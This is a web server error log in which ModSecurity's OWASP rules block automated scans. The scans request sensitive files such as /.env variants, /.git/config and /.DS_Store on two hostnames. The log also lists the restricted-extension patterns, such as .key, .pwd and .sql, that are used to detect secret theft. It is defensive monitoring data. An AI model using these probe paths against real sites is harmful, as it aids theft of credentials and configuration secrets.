http://economiasolidale.test.indacotrentino.com/.env.local
[Sun Dec 07 12:11:45.279321 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTVg8bHrKGegcZ_89jRaVgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.local
[Sun Dec 07 12:11:45.279507 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aTVg8bHrKGegcZ_89jRaVgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.local
[Sun Dec 07 12:11:45.396762 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTVg8bHrKGegcZ_89jRaVwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup
[Sun Dec 07 12:11:45.396923 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTVg8bHrKGegcZ_89jRaVwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup
[Sun Dec 07 12:11:45.397176 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTVg8bHrKGegcZ_89jRaVwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup
[Sun Dec 07 12:11:45.397383 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aTVg8bHrKGegcZ_89jRaVwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.backup
[Sun Dec 07 12:11:45.486563 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aTVg8bHrKGegcZ_89jRaWAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env
[Sun Dec 07 12:11:45.486850 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aTVg8bHrKGegcZ_89jRaWAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env
[Sun Dec 07 12:11:45.487034 2025] [:error] [pid 575822] [client 45.86.202.187:41299] [client 45.86.202.187] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aTVg8bHrKGegcZ_89jRaWAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env
[Sun Dec 07 15:21:41.798469 2025] [:error] [pid 575824] [client 45.139.104.171:55954] [client 45.139.104.171] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTWNdf-RuagOGlx6uupFZQAAAAs"]
[Sun Dec 07 15:21:41.798773 2025] [:error] [pid 575824] [client 45.139.104.171:55954] [client 45.139.104.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTWNdf-RuagOGlx6uupFZQAAAAs"]
[Sun Dec 07 15:21:41.798938 2025] [:error] [pid 575824] [client 45.139.104.171:55954] [client 45.139.104.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTWNdf-RuagOGlx6uupFZQAAAAs"]
[Sun Dec 07 23:09:02.957603 2025] [:error] [pid 573221] [client 3.72.52.8:43988] [client 3.72.52.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTX6_lvgbiRUkefMDcypmwAAAAM"]
[Sun Dec 07 23:09:02.957868 2025] [:error] [pid 573221] [client 3.72.52.8:43988] [client 3.72.52.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTX6_lvgbiRUkefMDcypmwAAAAM"]
[Sun Dec 07 23:09:02.958076 2025] [:error] [pid 573221] [client 3.72.52.8:43988] [client 3.72.52.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTX6_lvgbiRUkefMDcypmwAAAAM"]
[Mon Dec 08 03:41:09.250733 2025] [authz_core:error] [pid 594975] [client 206.189.19.19:56530] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Dec 08 03:41:12.271087 2025] [:error] [pid 595266] [client 206.189.19.19:56550] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTY6yHCstcovYVpwa4VbKAAAABE"]
[Mon Dec 08 03:41:12.272003 2025] [:error] [pid 595266] [client 206.189.19.19:56550] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTY6yHCstcovYVpwa4VbKAAAABE"]
[Mon Dec 08 03:41:12.272210 2025] [:error] [pid 595266] [client 206.189.19.19:56550] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTY6yHCstcovYVpwa4VbKAAAABE"]
[Mon Dec 08 03:41:13.251803 2025] [:error] [pid 595251] [client 206.189.19.19:56562] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTY6yU4-2Zoq-VaBtMROAgAAAAs"]
[Mon Dec 08 03:41:13.252066 2025] [:error] [pid 595251] [client 206.189.19.19:56562] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTY6yU4-2Zoq-VaBtMROAgAAAAs"]
[Mon Dec 08 03:41:13.252225 2025] [:error] [pid 595251] [client 206.189.19.19:56562] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTY6yU4-2Zoq-VaBtMROAgAAAAs"]
[Mon Dec 08 03:41:15.253679 2025] [:error] [pid 594973] [client 206.189.19.19:56568] [client 206.189.19.19] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTY6y2up1V1Hp6wm7uvsPwAAAAA"]
[Mon Dec 08 03:41:15.253926 2025] [:error] [pid 594973] [client 206.189.19.19:56568] [client 206.189.19.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTY6y2up1V1Hp6wm7uvsPwAAAAA"]
[Mon Dec 08 03:41:15.254099 2025] [:error] [pid 594973] [client 206.189.19.19:56568] [client 206.189.19.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTY6y2up1V1Hp6wm7uvsPwAAAAA"]
[Mon Dec 08 05:18:26.723795 2025] [:error] [pid 594975] [client 68.183.180.73:50098] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTZRkhecghAXZF1I4kEaoQAAAAI"]
[Mon Dec 08 05:18:26.724076 2025] [:error] [pid 594975] [client 68.183.180.73:50098] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTZRkhecghAXZF1I4kEaoQAAAAI"]
[Mon Dec 08 05:18:26.724249 2025] [:error] [pid 594975] [client 68.183.180.73:50098] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTZRkhecghAXZF1I4kEaoQAAAAI"]
[Mon Dec 08 05:18:27.745453 2025] [:error] [pid 594977] [client 68.183.180.73:50114] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTZRk5Xr0iaro2iz9FuULAAAAAQ"]
[Mon Dec 08 05:18:27.745685 2025] [:error] [pid 594977] [client 68.183.180.73:50114] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTZRk5Xr0iaro2iz9FuULAAAAAQ"]
[Mon Dec 08 05:18:27.745852 2025] [:error] [pid 594977] [client 68.183.180.73:50114] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTZRk5Xr0iaro2iz9FuULAAAAAQ"]
[Mon Dec 08 05:18:29.754801 2025] [:error] [pid 595259] [client 68.183.180.73:34808] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTZRld1yyOoL7tHiOlc11wAAAA4"]
[Mon Dec 08 05:18:29.755055 2025] [:error] [pid 595259] [client 68.183.180.73:34808] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTZRld1yyOoL7tHiOlc11wAAAA4"]
[Mon Dec 08 05:18:29.755289 2025] [:error] [pid 595259] [client 68.183.180.73:34808] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTZRld1yyOoL7tHiOlc11wAAAA4"]
[Mon Dec 08 07:05:32.245275 2025] [authz_core:error] [pid 595245] [client 167.71.175.236:52148] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Dec 08 07:05:35.287183 2025] [:error] [pid 595266] [client 167.71.175.236:52172] [client 167.71.175.236] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTZqr3CstcovYVpwa4VbQQAAABE"]
[Mon Dec 08 07:05:35.287420 2025] [:error] [pid 595266] [client 167.71.175.236:52172] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTZqr3CstcovYVpwa4VbQQAAABE"]
[Mon Dec 08 07:05:35.287591 2025] [:error] [pid 595266] [client 167.71.175.236:52172] [client 167.71.175.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTZqr3CstcovYVpwa4VbQQAAABE"]
[Mon Dec 08 07:05:36.240015 2025] [:error] [pid 594976] [client 167.71.175.236:52176] [client 167.71.175.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTZqsPGA4cWYuCeN8ogP9wAAAAM"]
[Mon Dec 08 07:05:36.240280 2025] [:error] [pid 594976] [client 167.71.175.236:52176] [client 167.71.175.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTZqsPGA4cWYuCeN8ogP9wAAAAM"]
[Mon Dec 08 07:05:36.240471 2025] [:error] [pid 594976] [client 167.71.175.236:52176] [client 167.71.175.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTZqsPGA4cWYuCeN8ogP9wAAAAM"]
